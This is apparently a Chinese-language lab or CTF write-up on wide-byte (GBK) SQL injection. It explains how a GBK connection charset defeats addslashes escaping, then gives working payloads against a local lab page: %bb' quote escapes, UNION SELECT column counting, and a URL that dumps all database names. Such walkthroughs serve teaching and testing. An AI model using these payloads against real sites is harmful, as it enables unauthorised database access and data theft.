0x01 相关知识
1. 宽字节是什么?
宽字节字符集:一般指Unicode编码的字符集
2. 宽字节注入的作用是什么?
可以绕过转义,也是绕过转义的其中一个办法
3. 宽字节注入产生的原因是什么?
MySQL连接时错误配置为:set character_set_client=gbk
本例错误配置PHP代码:$dbConnectWidth->query("SET names 'gbk'");
4.宽字节注入原理是什么?
当GPC开启(php.ini
magic_quotes_gpc = On)或使用addslashes函数过滤提交的参数时,测试注入点使用的单引号 ' 就会被转义为: \'
这个的作用就是对敏感函数的转义,让我们无法注入。
如果存在宽字节注入,我们输入%df%27时首先经过上面提到的转义就会变成%df%5c%27(%5c就是反斜杠)。之后再数据库查询由于使用了GBK多字节编码,即在汉字编码范围内两个字节会被编码为一个汉字,然后MySQL服务器会对查询语句进行了GBK编码%df%5c转换成汉字,而单引号逃出了,这个时候就可以注入了。%df不是固定的,可以自己组合。只要是汉字就可以。
参考链接:https://www.heibai.org/post/740.html
0x02 漏洞利用
1.上来看见这个
我们好像意识到了什么,好像有人在侮辱你。。。
2.常规注入手法:
1' | 页面没报错 刷新 |
1 and 1=1 %23 | 页面没报错 刷新 |
1 and 1=2 %23 | 页面没报错 刷新 |
1' and 1=1 %23 | 页面没报错 刷新 |
1' and 1=2 %23 | 页面没报错 刷新 |
1%bb' | 页面报错 |
3.页面既然已经报错 ok单引号逃出,那么就好办了 如同显错注入一般 首先判断列数:
输入 | 输出 |
3%bb' union select 1 %23 | 页面报错 |
3%bb' union select 1,2 %23 | 页面不报错 |
ok 判断出来列数为2
4.获取所有数据库的名称:
192.168.72.136/control/sqlinject/width_byte_injection.php?id=3%bb' union select 1,group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA %23
5.ok 剩下的步骤其实和显错注入一样
请看这篇文章。
6.最后放出flag:
dfsadfsadfas
0x03 结语
这个也很简单,没啥可说的